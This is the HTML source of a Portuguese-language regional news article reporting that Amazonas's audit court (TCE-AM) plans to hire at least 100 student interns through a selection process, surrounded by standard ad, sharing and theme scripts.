<div id='div-gpt-ad-1621892266039-0' style='min-width: 300px; min-height: 50px;' align='center'>
<script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1621892266039-0'); });
  </script>
</div>
<br></div>
<p>O Tribunal de Contas do Amazonas (TCE-AM) realizará um Processo Seletivo Simplificado (PSS) para contratação de pelo menos cem (100) estagiários para a Corte de Contas. A previsão é que o edital seja publicado até outubro deste ano.</p>
<p>O anúncio foi feito pela diretora-geral da Escola de Contas Públicas (ECP) do TCE-AM, Virna Pereira, durante o programa “Falando de Contas”, transmitido ao vivo pela Rádio Câmara Manaus, FM 105,5 MHz.</p>
<p>&#8220;Os acadêmicos que atuam na Corte de Contas são valorosos colaboradores que, junto aos nossos servidores, desempenham as funções do TCE-AM de forma célere. Sempre tivemos um corpo técnico forte contando com o auxílio dos acadêmicos que vem para somar e aprender na prática junto conosco&#8221;, comentou o presidente do TCE-AM, conselheiro Mario de Mello.</p>
<p>Segundo Virna Pereira, o andamento da nova seleção já foi aprovada pela coordenadora da ECP, conselheira Yara Lins dos Santos, e pelo Tribunal Pleno do TCE-AM e está em fase de planejamento.</p>

<div class="quads-location quads-ad31667" id="quads-ad31667" style="float:none;margin:3px 0 3px 0;text-align:center;">
<div id="quads-31667-place" class="quads-ll">

<ins style="display:block" data-ad-client="ca-pub-2882100866175389" data-ad-slot="6563305089" data-ad-format="auto" data-full-width-responsive="true"><span>Loading...</span></ins></div>
<script>
     instant= new adsenseLoader( '#quads-31667-place', {
                    onLoad: function( ad ){
                        if (ad.classList.contains("quads-ll")) {
                            ad.classList.remove("quads-ll");
                        }
                      }   
                    });
</script>
</div>
<p>“É uma novidade bastante esperada pelos universitários. Já entramos na fase de estudos e planejamento para uma nova seleção de estagiários, após proposta da coordenadora da ECP, conselheira Yara Lins dos Santos, que foi prontamente aprovada pelo presidente-conselheiro Mario de Mello e pelo plenário do TCE”, disse Virna Pereira.</p>
<p>Ainda segundo a diretora-geral da ECP, o número de vagas divididas por curso, assim como informações de datas e locais das provas serão divulgadas em breve. De acordo com Virna Pereira, entre os cursos que serão abrangidos pelo edital do PSS estão: direito, economia, contabilidade, administração, engenharia e comunicação social.</p>
<p>“Até o momento há o provisionamento de até cem estagiários para os nossos quadros, número que pode vir a aumentar. A previsão é que o edital seja lançado em meados de setembro ou outubro. Vale destacar que os universitários que tenham interesse em participar do processo seletivo podem se inscrever nos cursos da ECP, para já ter um conhecimento prévio da nossa realidade por meio das nossas atividades&#8221;, finalizou a diretora-geral da ECP, Virna Pereira.</p>
<div class='code-block code-block-1' style='margin: 8px 0; clear: both;'>

<div id='div-gpt-ad-1621892234933-0' style='min-width: 300px; min-height: 50px;' align='center'>
<script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1621892234933-0'); });
  </script>
</div>
<br>
</div>

<div class="td-a-rec td-a-rec-id-content_bottom  td_uid_2_60e78cabab65a_rand td_block_template_1"><img src="https://acriticadehumaita.com.br/wp-content/uploads/2020/10/4817154994946981174.gif">
<script async src=”https://securepubads.g.doubleclick.net/tag/js/gpt.js”></script>
<div id=”gpt-passback”>
<script>
window.googletag = window.googletag || {cmd: []};
googletag.cmd.push(function() {
googletag.defineSlot(‘/21799500428/informepub_mene’, [[300, 250], [728, 90], [1, 1]], ‘gpt-passback’).addService(googletag.pubads());
googletag.enableServices();
googletag.display(‘gpt-passback’);
});
</script>
</div></div> </div>
<footer>
<div class="td-post-source-tags">
</div>
<div class="td-post-sharing-bottom"><div id="td_social_sharing_article_bottom" class="td-post-sharing td-ps-bg td-ps-notext td-post-sharing-style1 "><div class="td-post-sharing-visible"><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Facriticadehumaita.com.br%2Fecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am%2F">
<div class="td-social-but-icon"><i class="td-icon-facebook"></i></div>
<div class="td-social-but-text">Facebook</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-twitter" href="https://twitter.com/intent/tweet?text=ECP+anuncia+processo+seletivo+para+contrata%C3%A7%C3%A3o+de+estagi%C3%A1rios+para+o+TCE-AM&url=https%3A%2F%2Facriticadehumaita.com.br%2Fecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am%2F&via=Acr%C3%ADtica+de+Humait%C3%A1+-+por+Chaguinha">
<div class="td-social-but-icon"><i class="td-icon-twitter"></i></div>
<div class="td-social-but-text">Twitter</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://acriticadehumaita.com.br/ecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am/&amp;media=https://acriticadehumaita.com.br/wp-content/uploads/2021/07/50c52481-d4b8-4348-aae2-8c5084beeff1.jpg&description=ECP+anuncia+processo+seletivo+para+contrata%C3%A7%C3%A3o+de+estagi%C3%A1rios+para+o+TCE-AM">
 <div class="td-social-but-icon"><i class="td-icon-pinterest"></i></div>
<div class="td-social-but-text">Pinterest</div>
</a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-whatsapp" href="whatsapp://send?text=ECP+anuncia+processo+seletivo+para+contrata%C3%A7%C3%A3o+de+estagi%C3%A1rios+para+o+TCE-AM %0A%0A https://acriticadehumaita.com.br/ecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am/">
<div class="td-social-but-icon"><i class="td-icon-whatsapp"></i></div>
<div class="td-social-but-text">WhatsApp</div>
</a></div><div class="td-social-sharing-hidden"><ul class="td-pulldown-filter-list"></ul><a class="td-social-sharing-button td-social-handler td-social-expand-tabs" href="#" data-block-uid="td_social_sharing_article_bottom">
<div class="td-social-but-icon"><i class="td-icon-plus td-social-expand-tabs-icon"></i></div>
</a></div></div></div> <div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="https://acriticadehumaita.com.br/author/ryan/">Ryan Vasquez</a></span></div> <span class="td-page-meta"><meta content="Ryan Vasquez"></span><meta content="2021-07-08T18:58:21+00:00"><meta itemprop="dateModified" content="2021-07-08T18:58:21-04:00"><meta itemid="https://acriticadehumaita.com.br/ecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am/" /><span class="td-page-meta" itemprop="publisher"><span class="td-page-meta" itemprop="logo"><meta itemprop="url" content="https://www.acriticadehumaita.com.br/wp-content/uploads/2017/12/BANNER-ACRITICA-DE-HUMAITÁ.gif"></span><meta content="Acrítica de Humaitá - por Chaguinha"></span><meta itemprop="headline " content="ECP anuncia processo seletivo para contratação de estagiários para o TCE-AM"><span class="td-page-meta" itemprop="image"><meta itemprop="url" content="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/50c52481-d4b8-4348-aae2-8c5084beeff1.jpg"><meta itemprop="width" content="1024"><meta itemprop="height" content="768"></span> </footer>
</article> 
<div class="td_block_wrap td_block_related_posts td_uid_3_60e78cabac070_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_3_60e78cabac070"><script>var block_td_uid_3_60e78cabac070 = new tdBlock();
block_td_uid_3_60e78cabac070.id = "td_uid_3_60e78cabac070";
block_td_uid_3_60e78cabac070.atts = '{"limit":12,"ajax_pagination":"next_prev","live_filter":"cur_post_same_categories","td_ajax_filter_type":"td_custom_related","class":"td_uid_3_60e78cabac070_rand","td_column_number":3,"live_filter_cur_post_id":36532,"live_filter_cur_post_author":"6","block_template_id":"","header_color":"","ajax_pagination_infinite_stop":"","offset":"","td_ajax_preloading":"","td_filter_default_txt":"","td_ajax_filter_ids":"","el_class":"","color_preset":"","border_top":"","css":"","tdc_css":"","tdc_css_class":"td_uid_3_60e78cabac070_rand","tdc_css_class_style":"td_uid_3_60e78cabac070_rand_style"}';
block_td_uid_3_60e78cabac070.td_column_number = "3";
block_td_uid_3_60e78cabac070.block_type = "td_block_related_posts";
block_td_uid_3_60e78cabac070.post_count = "12";
block_td_uid_3_60e78cabac070.found_posts = "6531";
block_td_uid_3_60e78cabac070.header_color = "";
block_td_uid_3_60e78cabac070.ajax_pagination_infinite_stop = "";
block_td_uid_3_60e78cabac070.max_num_pages = "545";
tdBlocksArray.push(block_td_uid_3_60e78cabac070);
</script><h4 class="td-related-title td-block-title"><a id="td_uid_4_60e78cabb4294" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_3_60e78cabac070" href="#">ARTIGOS RELACIONADOS</a><a id="td_uid_5_60e78cabb429a" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_3_60e78cabac070" href="#">Mais do autor</a></h4><div id=td_uid_3_60e78cabac070 class="td_block_inner">
<div class="td-related-row">
<div class="td-related-span4">
<div class="td_module_related_posts td-animation-stack td_mod_related_posts">
<div class="td-module-image">
<div class="td-module-thumb"><a href="https://acriticadehumaita.com.br/no-amazonas-37-municipios-zeram-internacoes-por-covid-19/" rel="bookmark" class="td-image-wrap" title="No Amazonas, 37 municípios zeram internações por Covid-19"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="No Amazonas, 37 municípios zeram internações por Covid-19" data-type="image_tag" data-img-url="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/763b0fac-85b0-466b-86af-a67e5af193ed-218x150.jpg" width="218" height="150" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://acriticadehumaita.com.br/no-amazonas-37-municipios-zeram-internacoes-por-covid-19/" rel="bookmark" title="No Amazonas, 37 municípios zeram internações por Covid-19">No Amazonas, 37 municípios zeram internações por Covid-19</a></h3> </div>
</div>
</div> 
<div class="td-related-span4">
<div class="td_module_related_posts td-animation-stack td_mod_related_posts">
<div class="td-module-image">
<div class="td-module-thumb"><a href="https://acriticadehumaita.com.br/em-humaita-am-prf-apreende-mais-uma-arma-de-fogo/" rel="bookmark" class="td-image-wrap" title="Em Humaitá/AM, PRF apreende mais uma arma de fogo"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Em Humaitá/AM, PRF apreende mais uma arma de fogo" data-type="image_tag" data-img-url="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/ae01571b-91e3-409d-9c12-5f5940bf212f-218x150.jpeg" width="218" height="150" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://acriticadehumaita.com.br/em-humaita-am-prf-apreende-mais-uma-arma-de-fogo/" rel="bookmark" title="Em Humaitá/AM, PRF apreende mais uma arma de fogo">Em Humaitá/AM, PRF apreende mais uma arma de fogo</a></h3> </div>
</div>
</div> 
<div class="td-related-span4">
<div class="td_module_related_posts td-animation-stack td_mod_related_posts">
<div class="td-module-image">
<div class="td-module-thumb"><a href="https://acriticadehumaita.com.br/ibge-preve-safra-recorde-de-2585-milhoes-de-toneladas-em-2021/" rel="bookmark" class="td-image-wrap" title="IBGE prevê safra recorde de 258,5 milhões de toneladas em 2021"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="IBGE prevê safra recorde de 258,5 milhões de toneladas em 2021" data-type="image_tag" data-img-url="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/2020-04-09t164128z_1_lynxnpeg381q6_rtroptp_4_brazil-soy-218x150.jpg" width="218" height="150" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://acriticadehumaita.com.br/ibge-preve-safra-recorde-de-2585-milhoes-de-toneladas-em-2021/" rel="bookmark" title="IBGE prevê safra recorde de 258,5 milhões de toneladas em 2021">IBGE prevê safra recorde de 258,5 milhões de toneladas em 2021</a></h3> </div>
</div>
</div> </div>
<div class="td-related-row">
<div class="td-related-span4">
<div class="td_module_related_posts td-animation-stack td_mod_related_posts">
<div class="td-module-image">
<div class="td-module-thumb"><a href="https://acriticadehumaita.com.br/inflacao-fica-em-053-em-junho-puxada-pela-alta-da-energia-eletrica/" rel="bookmark" class="td-image-wrap" title="Inflação fica em 0,53% em junho, puxada pela alta da energia elétrica"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Inflação fica em 0,53% em junho, puxada pela alta da energia elétrica" data-type="image_tag" data-img-url="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/agencia_brasil170912_mca7694-218x150.jpg" width="218" height="150" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://acriticadehumaita.com.br/inflacao-fica-em-053-em-junho-puxada-pela-alta-da-energia-eletrica/" rel="bookmark" title="Inflação fica em 0,53% em junho, puxada pela alta da energia elétrica">Inflação fica em 0,53% em junho, puxada pela alta da energia elétrica</a></h3> </div>
</div>
</div> 
<div class="td-related-span4">
<div class="td_module_related_posts td-animation-stack td_mod_related_posts">
<div class="td-module-image">
<div class="td-module-thumb"><a href="https://acriticadehumaita.com.br/governo-leiloa-rodovia-que-liga-mato-grosso-a-hidrovia-do-tapajos/" rel="bookmark" class="td-image-wrap" title="Governo leiloa rodovia que liga Mato Grosso à Hidrovia do Tapajós"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Governo leiloa rodovia que liga Mato Grosso à Hidrovia do Tapajós" data-type="image_tag" data-img-url="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/concessao_da_br_163_tcu_ministerio_da_infraestrutura-218x150.jpg" width="218" height="150" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://acriticadehumaita.com.br/governo-leiloa-rodovia-que-liga-mato-grosso-a-hidrovia-do-tapajos/" rel="bookmark" title="Governo leiloa rodovia que liga Mato Grosso à Hidrovia do Tapajós">Governo leiloa rodovia que liga Mato Grosso à Hidrovia do Tapajós</a></h3> </div>
</div>
</div> 
<div class="td-related-span4">
<div class="td_module_related_posts td-animation-stack td_mod_related_posts">
<div class="td-module-image">
<div class="td-module-thumb"><a href="https://acriticadehumaita.com.br/policias-de-nove-estados-fazem-operacao-de-combate-a-crimes-digitais/" rel="bookmark" class="td-image-wrap" title="Polícias de nove estados fazem operação de combate a crimes digitais"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Polícias de nove estados fazem operação de combate a crimes digitais" data-type="image_tag" data-img-url="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/09_07_2020_policia_civil-2-218x150.jpg" width="218" height="150" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://acriticadehumaita.com.br/policias-de-nove-estados-fazem-operacao-de-combate-a-crimes-digitais/" rel="bookmark" title="Polícias de nove estados fazem operação de combate a crimes digitais">Polícias de nove estados fazem operação de combate a crimes digitais</a></h3> </div>
</div>
</div> </div>
<div class="td-related-row">
<div class="td-related-span4">
<div class="td_module_related_posts td-animation-stack td_mod_related_posts">
<div class="td-module-image">
<div class="td-module-thumb"><a href="https://acriticadehumaita.com.br/cpi-apos-pagamento-de-fianca-roberto-dias-vai-responder-em-liberdade/" rel="bookmark" class="td-image-wrap" title="CPI: após pagamento de fiança, Roberto Dias vai responder em liberdade"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="CPI: após pagamento de fiança, Roberto Dias vai responder em liberdade" data-type="image_tag" data-img-url="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/roberto_ferreira_dias_cpi_07_de_julho-218x150.jpg" width="218" height="150" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://acriticadehumaita.com.br/cpi-apos-pagamento-de-fianca-roberto-dias-vai-responder-em-liberdade/" rel="bookmark" title="CPI: após pagamento de fiança, Roberto Dias vai responder em liberdade">CPI: após pagamento de fiança, Roberto Dias vai responder em liberdade</a></h3> </div>
</div>
</div> 
<div class="td-related-span4">
<div class="td_module_related_posts td-animation-stack td_mod_related_posts">
<div class="td-module-image">
<div class="td-module-thumb"><a href="https://acriticadehumaita.com.br/construcao-civil-tem-inflacao-de-246-em-junho/" rel="bookmark" class="td-image-wrap" title="Construção civil tem inflação de 2,46% em junho"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Construção civil tem inflação de 2,46% em junho" data-type="image_tag" data-img-url="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/construcao_civil_2306219892-218x150.jpg" width="218" height="150" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://acriticadehumaita.com.br/construcao-civil-tem-inflacao-de-246-em-junho/" rel="bookmark" title="Construção civil tem inflação de 2,46% em junho">Construção civil tem inflação de 2,46% em junho</a></h3> </div>
</div>
</div> 
<div class="td-related-span4">
<div class="td_module_related_posts td-animation-stack td_mod_related_posts">
<div class="td-module-image">
<div class="td-module-thumb"><a href="https://acriticadehumaita.com.br/camara-aprova-criacao-de-novo-titulo-de-investimento-em-infraestrutura/" rel="bookmark" class="td-image-wrap" title="Câmara aprova criação de novo título de investimento em infraestrutura"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Câmara aprova criação de novo título de investimento em infraestrutura" data-type="image_tag" data-img-url="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/monumentos_brasilia_cupula_plenario_da_camara_dos_deputados3103201340-218x150.jpg" width="218" height="150" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://acriticadehumaita.com.br/camara-aprova-criacao-de-novo-titulo-de-investimento-em-infraestrutura/" rel="bookmark" title="Câmara aprova criação de novo título de investimento em infraestrutura">Câmara aprova criação de novo título de investimento em infraestrutura</a></h3> </div>
</div>
</div> </div>
<div class="td-related-row">
<div class="td-related-span4">
<div class="td_module_related_posts td-animation-stack td_mod_related_posts">
<div class="td-module-image">
<div class="td-module-thumb"><a href="https://acriticadehumaita.com.br/cni-anuncio-do-uruguai-preocupa-demais-paises-do-mercosul/" rel="bookmark" class="td-image-wrap" title="CNI: anúncio do Uruguai preocupa demais países do Mercosul"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="CNI: anúncio do Uruguai preocupa demais países do Mercosul" data-type="image_tag" data-img-url="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/b6671630-968b-4b53-9bec-ed9e7729e414-218x150.jpeg" width="218" height="150" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://acriticadehumaita.com.br/cni-anuncio-do-uruguai-preocupa-demais-paises-do-mercosul/" rel="bookmark" title="CNI: anúncio do Uruguai preocupa demais países do Mercosul">CNI: anúncio do Uruguai preocupa demais países do Mercosul</a></h3> </div>
</div>
</div> 
<div class="td-related-span4">
<div class="td_module_related_posts td-animation-stack td_mod_related_posts">
<div class="td-module-image">
<div class="td-module-thumb"><a href="https://acriticadehumaita.com.br/governo-brasileiro-manifesta-solidariedade-ao-povo-do-haiti/" rel="bookmark" class="td-image-wrap" title="Governo brasileiro manifesta solidariedade ao povo do Haiti"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Governo brasileiro manifesta solidariedade ao povo do Haiti" data-type="image_tag" data-img-url="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/pzzb1916_0-218x150.jpg" width="218" height="150" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://acriticadehumaita.com.br/governo-brasileiro-manifesta-solidariedade-ao-povo-do-haiti/" rel="bookmark" title="Governo brasileiro manifesta solidariedade ao povo do Haiti">Governo brasileiro manifesta solidariedade ao povo do Haiti</a></h3> </div>
</div>
</div> 
<div class="td-related-span4">
<div class="td_module_related_posts td-animation-stack td_mod_related_posts">
<div class="td-module-image">
<div class="td-module-thumb"><a href="https://acriticadehumaita.com.br/governo-assina-contratos-para-investimentos-em-terminais-privados/" rel="bookmark" class="td-image-wrap" title="Governo assina contratos para investimentos em terminais privados"><img class="entry-thumb" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANoAAACWAQMAAACCSQSPAAAAA1BMVEWurq51dlI4AAAAAXRSTlMmkutdmwAAABpJREFUWMPtwQENAAAAwiD7p7bHBwwAAAAg7RD+AAGXD7BoAAAAAElFTkSuQmCC" alt="" title="Governo assina contratos para investimentos em terminais privados" data-type="image_tag" data-img-url="https://acriticadehumaita.com.br/wp-content/uploads/2021/07/mcam11062020-22-218x150.jpg" width="218" height="150" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="https://acriticadehumaita.com.br/governo-assina-contratos-para-investimentos-em-terminais-privados/" rel="bookmark" title="Governo assina contratos para investimentos em terminais privados">Governo assina contratos para investimentos em terminais privados</a></h3> </div>
</div>
</div> </div></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_3_60e78cabac070" data-td_block_id="td_uid_3_60e78cabac070"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#" class="td-ajax-next-page" id="next-page-td_uid_3_60e78cabac070" data-td_block_id="td_uid_3_60e78cabac070"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> 
<div class="comments" id="comments">
<div id="respond" class="comment-respond">
<h3 id="reply-title" class="comment-reply-title">DEIXE UMA RESPOSTA <small><a rel="nofollow" id="cancel-comment-reply-link" href="/ecp-anuncia-processo-seletivo-para-contratacao-de-estagiarios-para-o-tce-am/#respond" style="display:none;">Cancelar resposta</a></small></h3><form action="https://acriticadehumaita.com.br/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><div class="clearfix"></div>
<div class="comment-form-input-wrap td-form-comment">
<textarea placeholder="Comentário:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea>
<div class="td-warning-comment">Please enter your comment!</div>
</div>
<div class="comment-form-input-wrap td-form-author">
<input class="" id="author" name="author" placeholder="Nome:*" type="text" value="" size="30" aria-required='true' />
<div class="td-warning-author">Please enter your name here</div>
</div>
<div class="comment-form-input-wrap td-form-email">
<input class="" id="email" name="email" placeholder="E-mail:*" type="text" value="" size="30" aria-required='true' />
<div class="td-warning-email-error">You have entered an incorrect email address!</div>
<div class="td-warning-email">Please enter your email address here</div>
</div>
<div class="comment-form-input-wrap td-form-url">
<input class="" id="url" name="url" placeholder="Site:" type="text" value="" size="30" />
</div>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /><label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Postar Comentário" /> <input type='hidden' name='comment_post_ID' value='36532' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="7f620682d4" /></p><input type="hidden" id="ak_js" name="ak_js" value="90" /><textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100" style="display: none !important;"></textarea></form> </div>
</div> 
</div>
</div>
<div class="td-pb-span4 td-main-sidebar" role="complementary">
<div class="td-ss-main-sidebar">
<aside class="td_block_template_1 widget widget_black_studio_tinymce"><div class="textwidget"><p><iframe src="https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Facriticadehumaita%2F&tabs&width=340&height=214&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId=170224670058897" width="340" height="214" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowTransparency="true" allow="encrypted-media"></iframe></p>
</div></aside> </div>
</div>
</div> 
</div> 
</div> 



<div class="td-sub-footer-container td-container-wrap ">
<div class="td-container">
<div class="td-pb-row">
<div class="td-pb-span td-sub-footer-menu">
</div>
<div class="td-pb-span td-sub-footer-copy">
&copy; Produzido por <a href="https://hostamazonas.com.br/" target="_blank"> Host Amazonas - Agência Web</a> </div>
</div>
</div>
</div>
</div>

<script type='text/javascript' src='https://acriticadehumaita.com.br/wp-content/themes/Newspaper/js/tagdiv_theme.min.js?ver=9.5' id='td-site-min-js'></script>
<script type='text/javascript' src='https://acriticadehumaita.com.br/wp-includes/js/comment-reply.min.js?ver=5.5.5' id='comment-reply-js'></script>
<script type='text/javascript' src='https://acriticadehumaita.com.br/wp-includes/js/wp-embed.min.js?ver=5.5.5' id='wp-embed-js'></script>
<script async="async" type='text/javascript' src='https://acriticadehumaita.com.br/wp-content/plugins/akismet/_inc/form.js?ver=4.1.8' id='akismet-form-js'></script>

<script>
    

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'https://acriticadehumaita.com.br/wp-content/themes/Newspaper/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'https://acriticadehumaita.com.br/wp-content/themes/Newspaper';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>

<div id="cookie-notice" role="banner" class="cookie-notice-hidden cookie-revoke-hidden cn-position-bottom" aria-label="Cookie Notice" style="background-color: rgba(130,36,227,1);"><div class="cookie-notice-container" style="color: #fff;"><span id="cn-notice-text" class="cn-text-container">Usamos cookies para garantir uma melhor experiência em nosso site. Se você continuar a usar este site, assumiremos que está satisfeito com ele.</span><span id="cn-notice-buttons" class="cn-buttons-container"><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button bootstrap" aria-label="Ok">Ok</a><a href="https://acriticadehumaita.com.br/politica-de-privacidade/" target="_blank" id="cn-more-info" class="cn-more-info cn-button bootstrap" aria-label="Política de privacidade">Política de privacidade</a></span><a href="javascript:void(0);" id="cn-close-notice" data-cookie-set="accept" class="cn-close-icon" aria-label="Ok"></a></div>
</div>
<script>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</script>
<script type="text/javascript">(function(){window['__CF$cv$params']={r:'66bd26bf1b16e112',m:'d671b719386dd903a8e647b37ac9df36c5c274eb-1625787564-1800-ARAvSriVIEJQAU8Fp70L5u0hu+3qg/AFTMkao+qQ2/r7L6WWSMSmCYuJZXZackdz9PpDWbS5fS1OuMTthQ25OjvXrskynOjF1nUYNa7LE/8ntNfdACc9NX4Hfcv1E/SOmUA6dXsldRy3ZgV2zKaY/zSAky1F7pE0sEeEopTtPanaFWVQC+vVA1/Mg9tZa/7xFa1LgArVL6xXdLA4Utup/ow=',s:[0xd9d42cbfcc,0x635926b88c],}})();</script></body>
</html>